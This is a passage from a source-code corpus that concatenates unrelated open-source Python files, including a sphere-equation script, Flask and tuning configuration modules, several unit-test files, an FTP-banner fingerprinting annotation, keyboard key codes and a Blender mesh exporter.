(-1*self._D/2.0,-1*self._E/2.0,-1*self._F/2.0,float(m.sqrt(self._h)))
else :
return "\n<There is no graph for such equation "
if __name__ == "__main__":
sphere = Sphere(1,1,1,-2,-4,8,17)
print sphere.completing_the_squares()
print sphere
sphere1 = Sphere(1,1,1,10,4,2,-19)
print sphere1.completing_the_squares()
print sphere1
sphere2 = Sphere(2,2,2,-2,-3,5,-2)
print sphere2.completing_the_squares()
print sphere2
####C:\Windows\python "C:\Users\MyComputer\Documents\Pyt\Sphere7.py"
#(x² -2x + 1.0) + (y² -4y + 4.0) + (z² +8z + 16.0) = 4.0
#(x-1.0)² + (y-2.0)² + (z+4.0)² = 4.0
#<The graph of this equation is a sphere with centre (1.0,2.0,-4.0) #and radius 2.000
#(x² +10x + 25.0) + (y² +4y + 4.0) + (z² +2z + 1.0) = 49.0
#(x+5.0)² + (y+2.0)² + (z+1.0)² = 49.0
#<The graph of this equation is a sphere with centre (-5.0,-2.0,-1.0) #and radius 7.000
#(x² -1x + 0.25) + (y² -2y + 0.5625) + (z² +2z + 1.5625) = 3.375
#(x-0.5)² + (y-0.75)² + (z+1.25)² = 3.375
#<The graph of this equation is a sphere with centre (1.0,1.5,-2.5) #and radius 1.837
#################################################################
|
app_config.py | huhansan666666/flask_reddit | 461 | 12775248 | #!/usr/bin/env python2.7
"""
app_config.py stores all of the module configuration.
The database settings below assume MySQL.
"""
import os
_basedir = os.path.abspath(os.path.dirname(__file__))
DEBUG = False
ADMINS = frozenset(['<EMAIL>'])
SECRET_KEY = ''
SQLALCHEMY_DATABASE_URI = 'DATABASE://USERNAME:PASSWORD@localhost/YOUR_DB_NAME'
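# Example of a filled-in URI (hypothetical credentials and database name):
# SQLALCHEMY_DATABASE_URI = 'mysql://reddit_user:secret@localhost/flask_reddit'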
DATABASE_CONNECT_OPTIONS = {}
CSRF_ENABLED = True
CSRF_SESSION_KEY = ""
# Customize and add the settings below if you'd like to use reCAPTCHA. SSL is
# enabled by default and this is reCAPTCHA v2: users tick the "I'm not a robot"
# checkbox instead of answering a riddle.
# Please see: https://www.google.com/recaptcha
RECAPTCHA_DATA_ATTRS = {'theme': 'light'}
RECAPTCHA_PUBLIC_KEY = 'YOUR KEY HERE'
RECAPTCHA_PRIVATE_KEY = 'YOUR PRIVATE KEY HERE'
BRAND = "reddit"
DOMAIN = "YOUR_DOMAIN_HERE"
ROOT_URL = "http://YOUR_URL_HERE"
STATIC_ROOT = "/path/to/your/static/root/"
STATIC_URL = ROOT_URL + "/static/"
|
flask_table/__init__.py | nullptrT/flask_table | 215 | 12775274 | from .table import Table, create_table
from .columns import (
Col,
BoolCol,
DateCol,
DatetimeCol,
LinkCol,
ButtonCol,
OptCol,
NestedTableCol,
BoolNaCol,
)
|
tests/test_parser.py | kittinan/twitter_media_downloader | 161 | 12775305 | # coding: utf-8
"""
Unit tests for the parser module.
"""
from ..src.parser import parse_tweet
# pylint: disable=old-style-class,too-few-public-methods
class Struct:
"""Basic class to convert a struct to a dict."""
def __init__(self, **entries):
self.__dict__.update(entries)
USER = Struct(**{
'id_str': '456789',
'name': 'Super user',
'screen_name': 'superuser123',
})
TWEET = Struct(**{
'id_str': '123456',
'created_at': '2019-06-24 20:19:35',
'full_text': 'Hello world!',
'entities': {
'urls': [
{'expanded_url': 'https://instagram.com/test'},
{'expanded_url': 'https://www.google.com'},
{'expanded_url': 'https://periscope.tv/test'}
]
},
'user': USER,
'extended_entities': {
'media': [
{
'video_info': {
'variants': [
{
'bitrate': 123,
'url': 'video_123'
},
{
'bitrate': 789,
'url': 'video_789'
}
]
}
},
{
'media_url_https': 'video_789/video_thumb',
'sizes': ['thumb', 'large']
},
{
'media_url_https': 'my_image',
'sizes': ['thumb', 'large']
},
{
'media_url_https': 'other_image',
'sizes': ['thumb', 'medium']
}
]
}
})
TEXT_TWEET = Struct(**{
'id_str': '123456',
'created_at': '2019-06-24 20:19:35',
'user': USER,
'full_text': 'Hello world!'
})
RETWEET = Struct(**{
'id_str': '789',
'created_at': '2019-06-22 12:12:12',
'user': USER,
'retweeted_status': TWEET
})
def test_tweet():
"""Ensure that tweets with images and video are properly parsed."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(TWEET, True, 'large', results)
assert results['tweets'] == 1
assert results['retweets'] == 0
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '123456'
assert results['media'][0]['original_tweet_id'] == '123456'
assert results['media'][0]['text'] == ''
assert results['media'][0]['videos'] == ['video_789']
assert results['media'][0]['images'] == ['my_image:large', 'other_image']
assert results['media'][0]['urls']['periscope'] == ['https://periscope.tv/test']
assert results['media'][0]['urls']['instagram'] == ['https://instagram.com/test']
assert results['media'][0]['urls']['others'] == ['https://www.google.com']
def test_text_tweet():
"""Ensure that text tweets are properly parsed."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(TEXT_TWEET, True, 'large', results)
assert results['tweets'] == 1
assert results['retweets'] == 0
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '123456'
assert results['media'][0]['original_tweet_id'] == '123456'
assert results['media'][0]['text'] == 'Hello world!'
def test_retweet():
"""Ensure that retweets are properly parsed when enabled."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(RETWEET, True, 'large', results)
assert results['tweets'] == 0
assert results['retweets'] == 1
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '789'
assert results['media'][0]['original_tweet_id'] == '123456'
def test_retweet_disabled():
"""Ensure that retweets are not treated as such when they are disabled."""
results = {
'tweets': 0,
'retweets': 0,
'media': []
}
parse_tweet(RETWEET, False, 'large', results)
assert results['tweets'] == 1
assert results['retweets'] == 0
assert len(results['media']) == 1
assert results['media'][0]['tweet_id'] == '789'
assert results['media'][0]['original_tweet_id'] == '789'
|
optimus/engines/pandas/functions.py | ironmussa/Optimus | 1,045 | 12775311 | <reponame>ironmussa/Optimus
import numpy as np
import pandas as pd
from optimus.engines.base.pandas.functions import PandasBaseFunctions
from optimus.engines.base.dataframe.functions import DataFrameBaseFunctions
class PandasFunctions(PandasBaseFunctions, DataFrameBaseFunctions):
_engine = pd
@staticmethod
def dask_to_compatible(dfd):
from optimus.helpers.converter import dask_dataframe_to_pandas
return dask_dataframe_to_pandas(dfd)
@staticmethod
def df_concat(df_list):
return pd.concat(df_list, axis=0, ignore_index=True)
@staticmethod
def new_df(*args, **kwargs):
return pd.DataFrame(*args, **kwargs)
def count_zeros(self, series, *args):
return int((self.to_float(series).values == 0).sum())
def kurtosis(self, series):
# use scipy to match function from dask.array.stats
from scipy.stats import kurtosis
return kurtosis(self.to_float(series.dropna()))
def skew(self, series):
# use scipy to match function from dask.array.stats
from scipy.stats import skew
return skew(self.to_float(series.dropna()))
def exp(self, series):
return np.exp(self.to_float(series))
def sqrt(self, series):
return np.sqrt(self.to_float(series))
def reciprocal(self, series):
return np.reciprocal(self.to_float(series))
def radians(self, series):
return np.radians(self.to_float(series))
def degrees(self, series):
return np.degrees(self.to_float(series))
def ln(self, series):
return np.log(self.to_float(series))
def log(self, series, base=10):
return np.log(self.to_float(series)) / np.log(base)
def sin(self, series):
return np.sin(self.to_float(series))
def cos(self, series):
return np.cos(self.to_float(series))
def tan(self, series):
return np.tan(self.to_float(series))
def asin(self, series):
return np.arcsin(self.to_float(series))
def acos(self, series):
return np.arccos(self.to_float(series))
def atan(self, series):
return np.arctan(self.to_float(series))
def sinh(self, series):
        return np.sinh(self.to_float(series))
def cosh(self, series):
return np.cosh(self.to_float(series))
def tanh(self, series):
return np.tanh(self.to_float(series))
def asinh(self, series):
return np.arcsinh(self.to_float(series))
def acosh(self, series):
return np.arccosh(self.to_float(series))
def atanh(self, series):
return np.arctanh(self.to_float(series))
def floor(self, series):
return np.floor(self.to_float(series))
def ceil(self, series):
return np.ceil(self.to_float(series))
def normalize_chars(self, series):
return series.str.normalize("NFKD").str.encode('ascii', errors='ignore').str.decode('utf8')
|
iexfinance/tests/stocks/test_market_movers.py | jto-d/iexfinance | 653 | 12775350 | <filename>iexfinance/tests/stocks/test_market_movers.py
import pandas as pd
import pytest
from iexfinance.stocks import (
get_market_gainers,
get_market_iex_percent,
get_market_iex_volume,
get_market_losers,
get_market_most_active,
)
class TestMarketMovers(object):
def test_market_gainers(self):
li = get_market_gainers()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_losers(self):
li = get_market_losers()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_most_active(self):
li = get_market_most_active()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_iex_volume(self):
li = get_market_iex_volume()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
def test_market_iex_percent(self):
li = get_market_iex_percent()
assert isinstance(li, pd.DataFrame)
assert len(li) == pytest.approx(10, 1)
|
ztag/annotations/FtpKebi.py | justinbastress/ztag | 107 | 12775353 | <gh_stars>100-1000
import re
from ztag.annotation import Annotation
from ztag.annotation import OperatingSystem
from ztag import protocols
import ztag.test
class FtpKebi(Annotation):
protocol = protocols.FTP
subprotocol = protocols.FTP.BANNER
port = None
impl_re = re.compile("^220- Kebi FTP Server", re.IGNORECASE)
version_re = re.compile("\(Version (\d+(?:\.\d+)*)\)", re.IGNORECASE)
def process(self, obj, meta):
banner = obj["banner"]
if self.impl_re.search(banner):
meta.local_metadata.product = "Kebi Ftpd"
match = self.version_re.search(banner)
if match:
meta.local_metadata.version = match.group(1)
return meta
""" Tests
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 SINN \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Easy FTP\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server (Version 2.0.0)\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6\\xbf\\xa1 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"220- Kebi FTP Server ( \\xb1\\xfa\\xba\\xf1 FTP \\xbc\\xad\\xb9\\xf6 )\r\n220- Written by <NAME> - http://www.webkebi.com\r\n220 Kebi FTP \\xbc\\xad\\xb9\\xf6 \\xc1\\xa2\\xbc\\xd3\\xc0\\xbb \\xc8\\xaf\\xbf\\xb5\\xc7\\xd5\\xb4\\xcf\\xb4\\xd9. !\r\n"
"""
|
sp_api/auth/credentials.py | lionsdigitalsolutions/python-amazon-sp-api | 213 | 12775374 | import os
class Credentials:
def __init__(self, refresh_token, credentials):
self.client_id = credentials.lwa_app_id
self.client_secret = credentials.lwa_client_secret
self.refresh_token = refresh_token or credentials.refresh_token
|
tests.py | qiang123/regal | 432 | 12775383 | from unittest import TestCase
from regal import BaseInfo
from regal.grouping import GroupAlgorithm
from regal.check_interface import AlgorithmABC
# Run Method: python -m unittest -v tests.py
class TestBaseInfoInitial(TestCase):
def test_empty_info(self):
ab = BaseInfo('', '', '')
with self.assertRaises(AttributeError):
ab.grouping()
def test_empty_info_version_host_isdict(self):
ab = BaseInfo({}, '', '')
self.assertIsNotNone(ab.grouping())
def test_info_errortype(self):
ab = BaseInfo({}, '1', 'sds')
self.assertIsNotNone(ab.grouping())
class TestGroupingResult(TestCase):
ver = {
'ver1': '1.1.1.1,2.2.2.2,3.3.3.3,4.4.4.4,5.1.1.1,6.2.2.2,7.3.3.3,8.4.4.4'}
combine_num = 4
def test_combine_num(self):
ab = BaseInfo(
self.ver,
self.combine_num
)
instance_combine_num = ab.grouping().result[0][1]
self.assertEqual(len(instance_combine_num[1:-1][0]), self.combine_num)
def test_schedule_num(self):
schedule_num = 2
ab = BaseInfo(self.ver, self.combine_num, schedule_num)
instance_combine_num = ab.grouping().result[0][1]
self.assertEqual(len(instance_combine_num[0][0].split(',')), schedule_num)
class TestInstance(TestCase):
def test_algorithm_instance(self):
self.assertIsInstance(GroupAlgorithm(), AlgorithmABC)
|
neural_compressor/ux/utils/workload/tuning.py | intel/neural-compressor | 172 | 12775409 | # -*- coding: utf-8 -*-
# Copyright (c) 2021-2022 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Configuration tuning module."""
from typing import Any, Dict, List, Optional, Union
from neural_compressor.ux.utils.exceptions import ClientErrorException
from neural_compressor.ux.utils.json_serializer import JsonSerializer
from neural_compressor.ux.utils.utils import (
parse_bool_value,
parse_to_float_list,
parse_to_string_list,
)
class Strategy(JsonSerializer):
"""Configuration Strategy class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize configuration Strategy class."""
super().__init__()
# [Required] One of neural_compressor.strategy.STRATEGIES
self.name: str = data.get("name", "basic")
self.sigopt_api_token: Optional[str] = data.get("sigopt_api_token", None)
self.accuracy_weight: Optional[float] = data.get("accuracy_weight", None)
self.latency_weight: Optional[float] = data.get("latency_weight", None)
class MultiObjectives(JsonSerializer):
"""Configuration MultiObjectives class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize configuration MultiObjectives class."""
super().__init__()
self._objective: List[str] = data.get("objective", [])
self._weight: List[float] = data.get("weight", [])
@property
def objective(self) -> List[str]:
"""Get objectives."""
return self._objective
@objective.setter
def objective(self, value: Union[None, str, List[str]]) -> None:
"""Set inputs value."""
self._objective = parse_to_string_list(value)
@property
def weight(self) -> List[float]:
"""Get weights."""
return self._weight
@weight.setter
def weight(self, value: Union[None, float, List[float]]) -> None:
"""Set weights value."""
self._weight = parse_to_float_list(value)
class AccCriterion(JsonSerializer):
"""Configuration AccCriterion class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize configuration AccCriterion class."""
super().__init__()
self.relative: Optional[float] = data.get(
"relative",
None,
) # [Optional] (INT8-FP32)/FP32
self.absolute: Optional[float] = data.get(
"absolute",
None,
) # [Optional] INT8-FP32
# Set default accuracy criterion to relative
if self.relative is None and self.absolute is None:
self.relative = 0.1
class ExitPolicy(JsonSerializer):
"""Configuration ExitPolicy class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize Configuration ExitPolicy class."""
super().__init__()
self.timeout: Optional[int] = data.get("timeout", None)
self.max_trials: Optional[int] = data.get("max_trials", None)
self.performance_only: Optional[bool] = data.get("performance_only", None)
class Workspace(JsonSerializer):
"""Configuration Workspace class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize Configuration Workspace class."""
super().__init__()
self.path: Optional[str] = data.get("path", None) # [Optional]
self.resume: Optional[str] = data.get("resume", None) # [Optional]
class Tuning(JsonSerializer):
"""Configuration Tuning class."""
def __init__(self, data: Dict[str, Any] = {}) -> None:
"""Initialize Configuration Tuning class."""
super().__init__()
self.strategy: Strategy = Strategy()
if data.get("strategy"):
self.strategy = Strategy(data.get("strategy", {}))
self.accuracy_criterion: AccCriterion = AccCriterion(
data.get("accuracy_criterion", {}),
)
self.multi_objectives: Optional[MultiObjectives] = None
if data.get("multi_objectives"):
self.multi_objectives = MultiObjectives(data.get("multi_objectives", {}))
self.exit_policy: Optional[ExitPolicy] = None
if data.get("exit_policy"):
self.exit_policy = ExitPolicy(data.get("exit_policy", {}))
self.random_seed: Optional[int] = data.get("random_seed", None)
self.tensorboard: Optional[bool] = data.get("tensorboard", None)
self.workspace: Optional[Workspace] = None
if data.get("workspace", {}):
self.workspace = Workspace(data.get("workspace", {}))
def set_timeout(self, timeout: int) -> None:
"""Update tuning timeout in config."""
try:
timeout = int(timeout)
if timeout < 0:
raise ValueError
except ValueError:
raise ClientErrorException(
"The timeout value is not valid. " "Timeout should be non negative integer.",
)
if self.exit_policy:
self.exit_policy.timeout = timeout
else:
self.exit_policy = ExitPolicy({"timeout": timeout})
def set_max_trials(self, max_trials: int) -> None:
"""Update max tuning trials in config."""
try:
max_trials = int(max_trials)
if max_trials < 0:
raise ValueError
except ValueError:
raise ClientErrorException(
"The max trials value is not valid. " "Max trials should be non negative integer.",
)
if self.exit_policy:
self.exit_policy.max_trials = max_trials
else:
self.exit_policy = ExitPolicy({"max_trials": max_trials})
def set_performance_only(self, performance_only: Any) -> None:
"""Update performance only flag in config."""
try:
performance_only = parse_bool_value(performance_only)
except ValueError:
raise ClientErrorException(
"The performance_only flag value is not valid. "
"Performance_ony should be a boolean.",
)
if self.exit_policy:
self.exit_policy.performance_only = performance_only
else:
self.exit_policy = ExitPolicy({"performance_only": performance_only})
def set_random_seed(self, random_seed: int) -> None:
"""Update random seed value in config."""
try:
random_seed = int(random_seed)
except ValueError:
raise ClientErrorException(
"The random seed value is not valid. " "Random seed should be an integer.",
)
self.random_seed = random_seed
def set_workspace(self, path: str) -> None:
"""Update tuning workspace path in config."""
if self.workspace is None:
self.workspace = Workspace()
self.workspace.path = path
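    # Illustrative construction sketch (the dict keys mirror the data.get()
    # calls above; the concrete values are made up for the example):
    #
    #   tuning = Tuning({
    #       "strategy": {"name": "basic"},
    #       "accuracy_criterion": {"relative": 0.01},
    #       "exit_policy": {"timeout": 0, "max_trials": 100},
    #       "random_seed": 9527,
    #   })
    #   tuning.set_timeout(3600)  # replaces or creates the ExitPolicy timeout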
|
tests/domain/book/test_book.py | tamanobi/dddpy | 170 | 12775422 | import pytest
from dddpy.domain.book import Book, Isbn
class TestBook:
def test_constructor_should_create_instance(self):
book = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
)
assert book.id == "book_01"
assert book.isbn == Isbn("978-0321125217")
assert (
book.title
== "Domain-Driven Design: Tackling Complexity in the Heart of Softwares"
)
assert book.page == 560
assert book.read_page == 0
def test_book_entity_should_be_identified_by_id(self):
book_1 = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
read_page=50,
)
book_2 = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
read_page=120,
)
book_3 = Book(
id="book_02",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
read_page=50,
)
assert book_1 == book_2
assert book_1 != book_3
@pytest.mark.parametrize(
"read_page",
[
(0),
(1),
(320),
],
)
def test_read_page_setter_should_update_value(self, read_page):
book = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
)
book.read_page = read_page
assert book.read_page == read_page
@pytest.mark.parametrize(
"read_page, expected",
[
(0, False),
(559, False),
(560, True),
],
)
def test_is_already_read_should_true_when_read_page_has_reached_last_page(
self, read_page, expected
):
book = Book(
id="book_01",
isbn=Isbn("978-0321125217"),
title="Domain-Driven Design: Tackling Complexity in the Heart of Softwares",
page=560,
)
book.read_page = read_page
assert book.is_already_read() == expected
|
lackey/KeyCodes.py | Inobitec/lackey | 599 | 12775456 | <reponame>Inobitec/lackey
class Button():
LEFT = 0
CENTER = 1
RIGHT = 2
class Key():
""" Key codes for InputEmulation.Keyboard object.
Can be entered directly or concatenated with an existing string, e.g. ``type(Key.TAB)`` """
ENTER = "{ENTER}"
ESC = "{ESC}"
BACKSPACE = "{BACKSPACE}"
DELETE = "{DELETE}"
F1 = "{F1}"
F2 = "{F2}"
F3 = "{F3}"
F4 = "{F4}"
F5 = "{F5}"
F6 = "{F6}"
F7 = "{F7}"
F8 = "{F8}"
F9 = "{F9}"
F10 = "{F10}"
F11 = "{F11}"
F12 = "{F12}"
F13 = "{F13}"
F14 = "{F14}"
F15 = "{F15}"
F16 = "{F16}"
HOME = "{HOME}"
END = "{END}"
LEFT = "{LEFT}"
RIGHT = "{RIGHT}"
DOWN = "{DOWN}"
UP = "{UP}"
PAGE_DOWN = "{PAGE_DOWN}"
PAGE_UP = "{PAGE_UP}"
TAB = "{TAB}"
CAPS_LOCK = "{CAPS_LOCK}"
NUM_LOCK = "{NUM_LOCK}"
SCROLL_LOCK = "{SCROLL_LOCK}"
INSERT = "{INSERT}"
SPACE = "{SPACE}"
PRINTSCREEN = "{PRINTSCREEN}"
ALT = "{ALT}"
CMD = "{CMD}"
CTRL = "{CTRL}"
META = "{META}"
SHIFT = "{SHIFT}"
WIN = "{WIN}"
PAUSE = "{PAUSE}"
NUM0 = "{NUM0}"
NUM1 = "{NUM1}"
NUM2 = "{NUM2}"
NUM3 = "{NUM3}"
NUM4 = "{NUM4}"
NUM5 = "{NUM5}"
NUM6 = "{NUM6}"
NUM7 = "{NUM7}"
NUM8 = "{NUM8}"
NUM9 = "{NUM9}"
SEPARATOR = "{SEPARATOR}"
ADD = "{ADD}"
MINUS = "{MINUS}"
MULTIPLY = "{MULTIPLY}"
DIVIDE = "{DIVIDE}"
class KeyModifier():
""" Can be used with type() to modify another key, e.g. ``type(Key.DELETE, Key.CTRL+Key.ALT)`` """
CTRL = "{CTRL}"
SHIFT = "{SHIFT}"
ALT = "{ALT}"
META = "{META}"
CMD = "{CMD}"
WIN = "{WIN}" |
Blender Export/objc-export-2.5/objc_blend_2.5.6/export_objc.py | JavaZava/iOS-OpenGLES-Stuff | 199 | 12775463 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import os
import time
import shutil
import bpy
import mathutils
def write_objc(filepath,context):
out = open(filepath, 'w')
current_scene = bpy.context.scene
objs = current_scene.objects
#i know there has to be an easier way to do this, but i'm too lazy to look it up
for next_obj in objs:
if next_obj.type == 'MESH':
mesh = next_obj
print("Writing Object")
for i in current_scene.objects:
i.select = False #deselect all objects
mesh.select = True
current_scene.objects.active = mesh #set the mesh object to current
bpy.ops.object.mode_set(mode='EDIT') #Operators
bpy.ops.mesh.select_all(action='SELECT')#select all the face/vertex/edge
bpy.ops.mesh.quads_convert_to_tris() #Operators
current_scene.update()
bpy.ops.object.mode_set(mode='OBJECT') # set it in object
mesh = mesh.data
objectname = mesh.name
basename = objectname.capitalize()
out.write('#import "OpenGLCommon.h"\n\n\n')
if len(mesh.uv_textures) > 0:
out.write('static const TexturedVertexData3D %sVertexData[] = {\n' % basename)
#for face in uv: #loop through the faces
uv_layer = mesh.active_uv_texture
for face in mesh.faces:
faceUV = uv_layer.data[face.index]
i=0
for index in face.vertices:
if len(face.vertices) == 3:
vert = mesh.vertices[index]
out.write('\t{/*v:*/{%f, %f, %f}, ' % (vert.co.x, vert.co.y, vert.co.z) )
out.write('/*n:*/{%f, %f, %f}, ' % (vert.normal.x, vert.normal.y, vert.normal.z))
out.write('/*t:*/{%f, %f}' % ( faceUV.uv[i][0], faceUV.uv[i][1] ) )
out.write('},\n')
i+=1
out.write('};\n\n')
elif len(mesh.vertex_colors) > 0:
out.write('static const ColoredVertexData3D %sVertexData[] = {\n' % basename)
color_layer = mesh.active_vertex_color
for face in mesh.faces:
if len(face.vertices) == 3:
faceC = color_layer.data[face.index]
i=0
for index in face.vertices:
vert = mesh.vertices[index]
out.write('\t{/*v:*/{%f, %f, %f}, ' % (vert.co.x, vert.co.y, vert.co.z) )
out.write('/*n:*/{%f, %f, %f}, ' % (vert.normal.x, vert.normal.y, vert.normal.z))
out.write('/*c:*/{%f, %f, %f, %f}' % ( faceC.color1[i], faceC.color2[i], faceC.color3[i], faceC.color4[i]) )
out.write('},\n')
i+=1
out.write('};\n\n')
else:
out.write('static const VertexData3D %sVertexData[] = {\n' % basename)
for face in mesh.faces:
if len(face.vertices) == 3:
for index in face.vertices:
vert = mesh.vertices[index]
out.write('\t{/*v:*/{%f, %f, %f}, ' % (vert.co.x, vert.co.y, vert.co.z) )
out.write('/*n:*/{%f, %f, %f} ' % (vert.normal.x, vert.normal.y, vert.normal.z))
out.write('},\n')
out.write('};\n\n')
#if editmode: Window.EditMode(1)
out.write('#define k%sNumberOfVertices\t%i\n' % (basename, len(mesh.faces) * 3) )
out.write('// Drawing Code:\n')
out.write('// glEnableClientState(GL_VERTEX_ARRAY);\n')
if len(mesh.uv_textures) > 0:
out.write('// glEnableClientState(GL_TEXTURE_COORD_ARRAY);\n')
elif len(mesh.vertex_colors) > 0:
out.write('// glEnableClientState(GL_COLOR_ARRAY);\n')
out.write('// glEnable(GL_COLOR_MATERIAL)\n')
out.write('// glEnableClientState(GL_NORMAL_ARRAY);\n')
out.write('// glVertexPointer(3, GL_FLOAT, sizeof(')
if len(mesh.uv_textures) > 0:
out.write('TexturedVertexData3D')
elif len(mesh.vertex_colors) > 0:
out.write('ColoredVertexData3D')
else:
out.write('VertexData3D')
out.write('), &%sVertexData[0].vertex);\n' % basename)
out.write('// glNormalPointer(GL_FLOAT, sizeof(')
if len(mesh.uv_textures) > 0:
out.write('TexturedVertexData3D')
elif len(mesh.vertex_colors) > 0:
out.write('ColoredVertexData3D')
else:
out.write('VertexData3D')
out.write('), &%sVertexData[0].normal);\n' % basename)
if len(mesh.uv_textures) > 0:
